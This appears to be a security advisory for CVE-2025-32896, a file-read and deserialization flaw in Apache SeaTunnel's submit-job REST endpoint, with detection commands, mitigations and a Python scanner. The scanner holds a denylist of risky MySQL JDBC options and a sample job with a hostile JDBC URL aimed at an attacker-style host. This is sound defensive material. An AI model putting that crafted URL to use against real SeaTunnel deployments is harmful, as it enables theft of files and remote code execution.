Platform
java
Component
org.apache.seatunnel:seatunnel-engine-server
Fixed in
2.3.11
CVE-2025-32896 describes an Arbitrary File Read and Deserialization vulnerability discovered in Apache SeaTunnel. This vulnerability allows unauthorized users to perform malicious actions by exploiting the /hazelcast/rest/maps/submit-job endpoint. The vulnerability impacts versions of Apache SeaTunnel up to and including 2.3.9, and a fix is available in version 2.3.11.
An attacker who can reach the endpoint submits a job whose MySQL JDBC connection URL carries extra client-side parameters. Depending on the parameters supplied, the SeaTunnel process either reads arbitrary files from its own file system and hands them to the attacker's database endpoint, or deserializes attacker-controlled objects, which can lead to remote code execution. The blast radius is everything the SeaTunnel service account can read and every system the engine can reach, so successful exploitation can compromise the host outright. The pattern is the same as other Java deserialization issues in which crafted input is turned into live objects.
This CVE was published on 2025-06-19. No public proof-of-concept (PoC) code had been released at the time of writing, and the vulnerability is not listed in the CISA KEV catalog. The CVSS base score of 2.5 expresses low assessed severity; it is not a likelihood estimate (the EPSS figure below serves that purpose). Because a successful attack reaches file read and deserialization, prompt remediation is still warranted.
Organizations using Apache SeaTunnel for data integration and transformation pipelines are at risk, particularly where jobs are submitted through the /hazelcast/rest/maps/submit-job endpoint. Deployments that leave the legacy REST API reachable without client authentication are the most exposed.
• linux / server:
journalctl -u seatunnel -g "submit-job"
Review the job submissions the engine has recorded. The unit name and log wording are deployment-specific, so adjust both to what your SeaTunnel installation actually emits.
• java / supply-chain: Inspect SeaTunnel job submissions for MySQL JDBC URLs that carry unexpected extra parameters, and for connection URLs pointing at hosts that are not your own databases.
• generic web:
curl -s -o /dev/null -w '%{http_code}\n' -X POST -d '' http://<seatunnel-host>:<port>/hazelcast/rest/maps/submit-job
Run this from outside the trust boundary (replace the placeholders with your engine's address). Anything other than an authentication or authorization failure means the legacy endpoint accepts unauthenticated requests and should be restricted or disabled.
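The submission review above can be automated. The following scanner is an added example and is not code from the page or from the SeaTunnel project: it pulls MySQL JDBC URLs out of a submitted job definition and flags client-side options that turn the connection into a file-read or deserialization primitive. The parameter list is an assumption for this example (the advisory only says "extra parameters within the MySQL URL" without naming them), and the job text at the bottom is constructed sample input.

```python
"""Scan SeaTunnel job submissions for MySQL JDBC URLs carrying
client-side options that enable local file reads or deserialization."""
import re
from urllib.parse import parse_qsl

# Assumption for this example: the options worth flagging are the MySQL
# Connector/J client properties below. The advisory does not name the
# parameters abused, so treat this as a conservative denylist, not a
# reproduction of the exploit.
RISKY_PARAMS = {
    "allowloadlocalinfile": "enables LOAD DATA LOCAL INFILE (client-side file read)",
    "allowurlinlocalinfile": "allows URLs as LOCAL INFILE paths",
    "allowloadlocalinfileinpath": "permits LOCAL INFILE from a directory",
    "autodeserialize": "deserializes BLOB columns into Java objects",
    "queryinterceptors": "loads classes named in the URL",
    "statementinterceptors": "legacy name of queryInterceptors",
    "exceptioninterceptors": "loads classes named in the URL",
}

# Matches jdbc:mysql://, jdbc:mysql+srv://, jdbc:mysql:replication:// and
# jdbc:mysql:loadbalance:// URLs up to the closing quote or whitespace.
JDBC_URL_RE = re.compile(
    r"jdbc:mysql(?:\+srv)?:(?:(?:replication|loadbalance):)?//[^\s\"']+",
    re.IGNORECASE,
)


def risky_params(jdbc_url):
    """Return [(name, value, reason)] for every risky option in one JDBC URL.

    Names are compared case-insensitively and percent-decoded, so
    'AllowLoadLocalInfile' and '%61llowLoadLocalInfile' are both caught.
    """
    _, _, query = jdbc_url.partition("?")
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        reason = RISKY_PARAMS.get(name.lower())
        if reason is not None:
            hits.append((name, value, reason))
    return hits


def scan_job_config(job_text):
    """Find MySQL JDBC URLs in a submitted job and report the risky ones."""
    findings = []
    for match in JDBC_URL_RE.finditer(job_text):
        url = match.group(0)
        hits = risky_params(url)
        if hits:
            findings.append({"url": url, "params": hits})
    return findings


# Constructed sample job (HOCON-style, as SeaTunnel jobs are written).
# The source URL is benign; the sink URL points at an attacker-style host
# and carries file-read and deserialization options.
SAMPLE_JOB = """
env { parallelism = 1 }
source {
  Jdbc {
    url = "jdbc:mysql://db.internal:3306/orders?useSSL=false"
    query = "select * from orders"
  }
}
sink {
  Jdbc {
    url = "jdbc:mysql://203.0.113.7:3306/x?allowLoadLocalInfile=true&autoDeserialize=true"
  }
}
"""

if __name__ == "__main__":
    for finding in scan_job_config(SAMPLE_JOB):
        print("risky JDBC URL:", finding["url"])
        for name, value, reason in finding["params"]:
            print(f"  {name}={value}: {reason}")
```

Run it against the body of each submit-job request (or the stored job definitions) and alert on any finding; a URL that targets a host outside your database inventory is worth alerting on even when no risky parameter is present. The scanner only understands the `?key=value` form of the URL, not Connector/J's `address=(key=value)` syntax.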
disclosure
Exploit status
EPSS
0.19% (41st percentile)
The primary mitigation is to upgrade Apache SeaTunnel to version 2.3.11 or later, which contains the fix. As an interim measure, disable the /hazelcast/rest/maps/submit-job endpoint if it is not essential. Enabling the RESTful API v2 and enforcing HTTPS two-way authentication (mutual TLS) further restricts who can reach the engine and reduces the attack surface. Review and restrict access to the SeaTunnel environment, limiting user privileges to the minimum necessary.
Upgrade Apache SeaTunnel to version 2.3.11 or later. In addition, enable the RESTful API v2 and configure two-way HTTPS authentication to mitigate the vulnerability.
CVE-2025-32896 is a LOW severity vulnerability affecting Apache SeaTunnel versions up to 2.3.9, allowing unauthorized users to read arbitrary files and potentially execute code through the submit-job API.
You are affected if you are using Apache SeaTunnel version 2.3.9 or earlier. Upgrade to version 2.3.11 to resolve the issue.
Upgrade to Apache SeaTunnel version 2.3.11. Additionally, enable restful api-v2 and HTTPS two-way authentication for enhanced security.
There is currently no confirmed evidence of active exploitation, but the potential impact warrants prompt remediation.
Refer to the Apache SeaTunnel project's security announcements for the official advisory: [https://seatunnel.apache.org/docs/security/](https://seatunnel.apache.org/docs/security/)